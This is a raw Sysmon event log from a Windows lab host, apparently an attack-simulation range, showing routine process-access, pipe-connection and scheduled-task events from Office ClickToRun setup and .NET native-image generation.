10341000x800000000000000076928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.686{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.670{A7A01FEF-EBF9-607E-EB0D-00000000BB01}27042860C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.654{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-EB0D-00000000BB01}2704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.654{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.654{A7A01FEF-EBF8-607E-DD0D-00000000BB01}44724268C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9acd6|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e73a8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1481b|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f8d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.663{A7A01FEF-EBF9-607E-EA0D-00000000BB01}6220C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Create /tn "Microsoft\Office\Office Feature Updates" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates.xml"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /I /Extension /Msi /StreamFull MsiName=C2RInt.16.msi,C2RIntLoc.en-us.16.msi,* PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000076922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.639{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Feature UpdatesMD5=6711BDD62C8C6CA1B147758423907878,SHA256=31F95CFD210A85FBA7CBDD0FF227830B2106E7F1CF919658F4998099803A8561,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.623{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-E90D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.623{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.623{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.623{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.623{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.607{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-E90D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.607{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF9-607E-E90D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.545{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-E80D-00000000BB01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.529{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.529{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.529{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.529{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.514{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-E60D-00000000BB01}3008C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft 